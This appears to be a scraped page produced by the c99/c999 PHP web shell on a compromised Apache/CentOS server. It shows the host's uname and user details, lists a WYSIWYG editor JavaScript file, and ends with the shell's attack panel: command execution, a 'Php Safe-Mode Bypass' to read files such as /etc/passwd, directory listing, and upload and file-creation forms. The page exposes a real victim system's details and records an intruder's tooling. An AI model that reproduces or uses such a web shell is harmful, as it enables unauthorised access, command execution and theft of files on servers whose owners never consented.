!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/editor/   drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)


" str = str.replace(/IURL/g, iurl); return str ; } function createEditor(id,wi,hi) { var strx = "" var idA= id.split('VDevID') strx += "" var str="
Viewing file:     quickB.js (23.38 KB)      -rw-r--r--
var fID; //*** IFRAME ID var TXTOBJ; //*** TEXT Obj var format = new Array(); var viewm = new Array(); /**************************************/ document.onmousedown=doMousedown document.onmouseup=doMouseup function changetoIframeEditor(el) { var wi= '', hi= ''; if(el.style.height) hi= " height=" + el.style.height else if(el.rows) hi= " height=" + (14*el.rows+28) if(el.style.width) wi= " width=" + el.style.width else if(el.cols) wi= " width=" + (6*el.cols +25) var parent= el.parentElement while(parent.tagName != 'FORM') parent= parent.parentElement var oform= parent var fidx=0; while(document.forms[fidx] != oform) fidx++ ; // form index var val='' if(el.tagName=='TEXTAREA'){ fID= fidx+'VDevID'+el.name; val= el.innerText } else fID= fidx+'VDevID'+el.id var strx = createEditor(fID,wi,hi); el.outerHTML= strx iEditor(fID) if(el.tagName!='TEXTAREA') return var reg= eval("/
/i") ; if( reg.test(val) ) val= val.replace(/\n/g, ""); else val= val.replace(/\n/g, "
"); val= val.replace(/\r/g, ""); val= val.replace(/\t/g, ""); val= val.replace(/\\/g, "\"); val= val.replace(/\'/g, "'"); setTimeout("document.frames['"+fID+"'].document.body.innerHTML='"+val+"'",200) oform[fID.split('VDevID')[1]].value= val } function iEditor(idF) { var obj=document.frames[idF] obj.document.designMode="On" obj.document.onmousedown= function(){ TXTOBJ=null; fID=idF; FMousedown();} format[idF]='HTML' viewm[idF]=1; } function formatDialogF() { var y = screen.height - parseInt('30em')*14 - 30 var feature = "font-family:Tahoma; font-size:10pt; dialogWidth:30em; dialogHeight:27em; dialogTop:"+y feature+= ";edge:sunken; help:no; status:no" var dialog= QBPATH+'/dialog.html' var arr= showModalDialog(dialog, "visual", feature); if(arr==null) return ; doFormatF(arr) } function FMousedown() { var objF=document.frames[fID]; // if(objF && objF.event && objF.event.button==2) formatDialogF(); var el = objF.event.srcElement doClick(el) } // init all found TEXTAREA in document function changeAllTextareaToEditors() { var i=0; while(document.all.tags('textarea')[i]) { changetoIframeEditor(document.all.tags('textarea')[i]) if(++i>0 && !document.all.tags('textarea')[i] ) i=0; } } // init all found IFRAME in document to Editable function changeAllIframeToEditors() { var i=0; while(document.all.tags('iframe')[i]) { changetoIframeEditor(document.all.tags('iframe')[i]) i++ } } // init only IFRAMEs that have "id=argument of initEditors" // e.g. changeIframeToEditor('id1','id2',...) function changeIframeToEditor() { for(var j=0;j\
" str += controlRows(); str += "
" str += strx + "
" ; return str ; } ///////////////////////////////////////////////////////////////// function doFormatF(arr) { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var cmd = new Array(); cmd = arr.split(',') if(cmd[0]=='SelectAll') selectAll(); else if(cmd[0]=='Swap[Text/HTML]') swapMode(); else if(cmd[0]=='Swap[Uni/View]') swapView(); else if(cmd[0]=='InsertTable') insertTable(); else if(cmd[0]=='TablePropeties') tableProp(); else if(cmd[0]=='CellPropeties') cellProp(); else if(cmd[0]=='InsertLayer') insertDivLayer(); else if(cmd[0]=='EditLayerBorder') editDivBorder(); else if(cmd[0]=='EditLayerFilter') editDivFilter(); else if(cmd[0]=='Emotions') editEmotions(cmd[1],objF); else { var edit=objF.document; if(cmd[0]=='formatBlock') edit.execCommand(cmd[0],false,"<"+cmd[1]+">") else if(cmd[0]=='InsertImage' && !cmd[1] ) { alert('Please notice:\nThe "Picture Source" in follow Dialog must be a URL, not a local address.'); // alert(cmd[0]); // alert(cmd[1]); edit.execCommand(cmd[0],true,"") } else { // alert(cmd[0]); // alert(cmd[1]); edit.execCommand(cmd[0],false,cmd[1]); } } } function editEmotions(wrd,obj) { var caret=obj.document.selection.createRange(); obj.curword=caret.duplicate(); obj.curword.text= wrd + ' ' } function swapView() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() if(format[fID]=="HTML") { objF.document.body.style.fontFamily="Tahoma" objF.document.body.style.fontSize="10pt" objF.document.body.style.color="black" objF.document.body.style.background="#e0e0f0" var strx=objF.document.body.innerHTML if(viewm[fID]) strx=toUnicode(strx) else strx=viewISOCode(strx) format[fID]="Text" } else { var strx=objF.document.body.innerText if(viewm[fID]) strx=toUnicode(strx) else strx=viewISOCode(strx) } objF.document.body.innerText=strx viewm[fID]=1 - viewm[fID] } function swapMode() { var objF=document.frames[fID]; if(!objF){alert('Please click to select 
the editor');return} objF.focus() if(format[fID]=="HTML") { var strx=objF.document.body.innerHTML objF.document.body.innerText=strx objF.document.body.style.fontFamily="monospace" objF.document.body.style.fontSize="10pt" objF.document.body.style.color="black" objF.document.body.style.background="#e0e0f0" format[fID]="Text" } else { objF.document.body.style.fontFamily='Tahoma' objF.document.body.style.color="#000000" objF.document.body.style.background="" var strx=objF.document.body.innerText objF.document.body.innerHTML=strx format[fID]="HTML" viewm[fID]=1 } } function selectAll() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var s=objF.document.body.createTextRange() s.execCommand('SelectAll') } function doFormatDialog(file,cmd,arg) { var urlx= QBPATH + '/' + file var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} var arr=showModalDialog(urlx, arg, "font-family:Tahoma; font-size:12px; dialogWidth:30em; dialogHeight:34em; edge:sunken; help:no; status:no"); if(arr !=null) doFormatF(cmd+','+arr) } function selectEmoticon() { doFormatDialog('emoticon.html','InsertImage',QBPATH) } function selectBgColor() { doFormatDialog('selcolor.html','BackColor','') } function selectFgColor() { doFormatDialog('selcolor.html','ForeColor','') } function characters() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus(); var sel = objF.document.selection; if(sel.type=="Control") return var urlx= QBPATH + '/selchar.html' var arr=showModalDialog(urlx, '', "font-family:Tahoma; font-size:12px; dialogWidth:30em; dialogHeight:34em; edge:sunken; help:no; status:no"); if(arr==null) return var arrA = arr.split(';QuIcKbUiLd;') var strx= "" + arrA[1] + "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } function doUploadFile() { var urlx= QBPATH + '/contents_upload.php' var twidth= 0.8*screen.width, 
theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"upload","toolbar=no,width=600,height=250,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function help2() { var urlx= QBPATH + '/iconhelp.html' /* var twidth= 0.1*screen.width, theight=300; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 25*/ var newWin1=window.open(urlx,"help","toolbar=no,width=710,height=700,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") // newWin1.moveTo(tposx,tposy); newWin1.focus() } function dolinkFile() { var urlx= QBPATH + '/loadlinkgo.php' var twidth= 0.8*screen.width, theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"linkins","toolbar=no,width=500,height=360,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function insertLink(linkurl,namelink) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" + namelink + "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "" + namelink + "," doFormat(strx,caret) } } function insertflash(infla) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } } function linkins(linkurl,linkname) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" + linkname + "" var 
Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "" + linkname + "," doFormat(strx,caret) } } function linkinimg(linkurl,linkname) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "" doFormat(strx,caret) } } function field2form(str1) { var str2 var index var lenx index=str1.indexOf('=0) { lenx=str1.length str1=str1.substring(0,index) + "') while(index>=0) { lenx=str1.length str1=str1.substring(0,index) + "" + str1.substring(index+11,lenx) index=str1.indexOf('
') } return str1 } function form2field(str1) { var str2 var index var lenx index=str1.indexOf('=0) { lenx=str1.length str1=str1.substring(0,index) + "') while(index>=0) { lenx=str1.length str1=str1.substring(0,index) + "
" + str1.substring(index+7,lenx) index=str1.indexOf('') } return str1 } function insertDivLayer() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null) return var Range = sel.createRange(); var wrd='' ; if(sel.type!="Control") { if(!Range.duplicate) return; objF.curword=Range.duplicate(); wrd= objF.curword.text; if(wrd=='') wrd="กรุณาดับเบิ้ลคิลกที่กล่องข้อความเพื่อพิมพ์ข้อความ และฉันสามารถช่วยคุณสร้างหน้าข่าวของคุณให้น่าสนใจได้ เครื่องมือที่มีอยู่สามารถช่วยให้คุณตบแต่งกล่องข้อความนี้ให้ดูดีได้ตัวตัวคุณเอง หากคุณสนใจลองมองปุ่มสี่ฟ้า 3 ปุ่มในเนวิเกเตอร์บาร์ด้านล่างแล้วลองใช้ แต่อย่าลืมเลือกกล่องข้อความก่อนทำล่ะ" var arr= "
"+ wrd + "
" ; Range.pasteHTML(arr); return } if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divstyle.html' var twidth= 0.8*screen.width, theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divstyle","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function editDivBorder() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null || sel.type!='Control') {alert('กรุณาเลือกกล่องข้อความที่ต้องการตบแต่ง');return} var Range = sel.createRange(); if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divborder.html' var twidth= 0.8*screen.width, theight=215; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divborder","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function editDivFilter() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null || sel.type!='Control') {alert('กรุณาเลือกกล่องข้อความที่ต้องการตบแต่ง');return} var Range = sel.createRange(); if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divfilter.html' var twidth= 0.8*screen.width, theight=210; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divfilter","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } /**** From Html-Code to UNICODE ***********/ function viewISOCode(str1) { var c0, str2='', strx='', idx; idx=str1.indexOf('&#') if(idx<0) return str1 var i=0 while (i4 : no Visual-Editor, only 
use Rightmouse-Control

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--